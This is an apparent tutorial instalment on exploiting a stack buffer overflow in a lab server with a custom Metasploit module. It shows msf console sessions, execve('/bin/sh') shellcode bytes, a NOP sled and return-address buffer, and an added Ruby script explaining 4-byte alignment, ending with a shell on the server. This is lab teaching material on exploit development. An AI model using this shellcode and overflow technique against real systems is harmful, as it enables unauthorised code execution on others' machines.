Let's first try attacking with the module as it stands:
msf > use exploit/linux/myvictim
msf exploit(myvictim) > set payload linux/x86/
set payload linux/x86/metsvc_bind_tcp    set payload linux/x86/shell_reverse_tcp2    set payload linux/x86/metsvc_reverse_tcp
msf exploit(myvictim) > set payload linux/x86/metsvc_bind_tcp
payload => linux/x86/metsvc_bind_tcp
msf exploit(myvictim) > set RHOST 10.10.10.133
RHOST => 10.10.10.133
msf exploit(myvictim) > set RPORT 7777
RPORT => 7777
msf exploit(myvictim) > exploit

[*] Started bind handler
[*] Sending the byte payload ...
[*] Exploit completed, but no session was created.
Server-side output:

…:/mnt/hgfs/r/stack$ ./server
socket
bind
listen
server is run...
accept
the IP of the client is: 10.10.10.128
the port of the client is: 52308
close 2
recv
accept
sp=0xbffff488, addr=0xbffff4a4
Obviously the attack did not achieve its goal. I think there are two possible reasons: first, the return address in the module is wrong; second, the payload itself may be the problem.
We make two changes. First, fix the return address in the target definition. The server prints the address of the buffer on the stack (addr=0xbffff4a4), so that is the value to use for 'Ret':

[ 'myvictim server running on Linux', { 'Platform' => 'linux', 'Ret' => 0xbffff4a4 } ],
Second, for the payload we first use the /bin/sh shellcode that we validated earlier, instead of the Metasploit-generated one:

# Build the buffer for transmission
buf = ''
buf = make_nops(15)                              # 15 NOPs (the count given in the text): 15 + 45-byte shellcode = 60 bytes
buf += "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
buf += "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
buf += "\x80\xe8\xdc\xff\xff\xff/bin/sh"         # classic execve("/bin/sh") shellcode, 45 bytes
#buf += "\xa4\xf4\xff\xbf"
#buf += payload.encoded
buf += [].fill(target.ret, 0, 100).pack('V*')    # 100 copies of the return address, 32-bit little-endian
Note in particular the number of NOP instructions: 15, as we added last time. I was stuck here for a long time because of an alignment problem. On a 32-bit platform the stack is 4-byte aligned, so the NOP sled plus the shellcode must add up to a multiple of 4 bytes (15 + 45 = 60); otherwise the copies of the return address are shifted relative to the 4-byte slot holding the saved return address, and the value that lands in EIP is a scrambled mix of bytes from two neighbouring copies.
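To make the alignment point concrete, here is an added Ruby example (not code from the original module) that builds the same buffer layout as above: a NOP sled, the 45-byte /bin/sh shellcode, and 100 copies of the return address 0xbffff4a4 that the server printed. `"\x90" * n` stands in for Metasploit's make_nops(n), and the function names (build_buffer, aligned_words, ret_overwrite_ok?, packed_ret) are mine. It reads the 32-bit words at 4-byte-aligned offsets of the return-address region, which is where the saved return address sits when the buffer itself starts at an aligned address such as 0xbffff4a4, and shows that 15 NOPs give a clean overwrite while 14 or 16 scramble the bytes. It also shows why the address must be packed with 'V' (32-bit) rather than 'v' (16-bit).

```ruby
# Added example: buffer layout and alignment check for the exploit above.
# Not part of the original Metasploit module; "\x90" * n stands in for
# make_nops(n), and RET is the addr value printed by the server.

SHELLCODE = (
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" \
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" \
  "\x80\xe8\xdc\xff\xff\xff/bin/sh"
).b                                   # 45 bytes, classic execve("/bin/sh")

RET = 0xbffff4a4                      # buffer address printed by the server

# NOP sled + shellcode + `copies` copies of the 32-bit return address.
def build_buffer(nop_count, ret = RET, copies = 100)
  sled = ("\x90" * nop_count).b       # stands in for make_nops(nop_count)
  sled + SHELLCODE + [ret].pack('V') * copies   # 'V' = 32-bit little-endian
end

# 32-bit words at 4-byte-aligned offsets from `start` onwards. Because the
# buffer starts at an aligned address (0xbffff4a4), an aligned offset in the
# buffer is an aligned stack slot; the saved return address is one of them.
def aligned_words(buf, start)
  first = (start + 3) & ~3            # first aligned offset at or after start
  buf[first..-1].unpack('V*')         # a trailing partial word is ignored
end

# True when every aligned word in the return-address region decodes to RET,
# i.e. when nop_count + shellcode length is a multiple of 4.
def ret_overwrite_ok?(nop_count)
  buf   = build_buffer(nop_count)
  start = nop_count + SHELLCODE.bytesize
  aligned_words(buf, start).all? { |w| w == RET }
end

# Hex of RET packed with a given directive: 'V' keeps all 4 bytes,
# 'v' silently truncates the address to its low 16 bits.
def packed_ret(directive, ret = RET)
  [ret].pack(directive).unpack1('H*')
end

if __FILE__ == $0
  [14, 15, 16].each do |n|
    start = n + SHELLCODE.bytesize
    word  = aligned_words(build_buffer(n), start).first
    printf("%2d NOPs: prefix %2d bytes, aligned word 0x%08x -> %s\n",
           n, start, word, ret_overwrite_ok?(n) ? "ok" : "misaligned")
  end
  puts "pack('V') => #{packed_ret('V')}   pack('v') => #{packed_ret('v')}"
end
```

Run it with `ruby align.rb`: only the 15-NOP buffer yields 0xbffff4a4 in every aligned slot; with 14 NOPs the slot reads 0xa4bffff4 and with 16 it reads 0xfff4a4bf, neither of which points into the sled. The last line shows that 'v' would send only two bytes per copy, so the overwrite could never be the intended address regardless of alignment.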
Then run it again:

msf exploit(myvictim) > rexploit
[*] Reloading module...
[*] Started bind handler
[*] Sending the byte payload ...
[*] Exploit completed, but no session was created.

Note that this is rexploit, which reloads the module before running it, since I have just modified it.
On the server side you can see:

the IP of the client is: 10.10.10.128
the port of the client is: 47336
close 2
accept
recv
sp=0xbffff488, addr=0xbffff4a4
$
$

The `$` prompts are a shell: the overflow worked. The shellcode here is written into the buffer by hand rather than taken from payload.encoded, because when I tried payload.encoded there was no response, presumably because the generated code could not be executed. This also explains why Metasploit still reports no session: the hand-written shellcode is a plain execve("/bin/sh") that inherits the server's stdin and stdout, so the shell appears on the server's own console rather than on the socket, and the bind handler finds nothing listening on the target.
Stack overflow attack using Metasploit (5)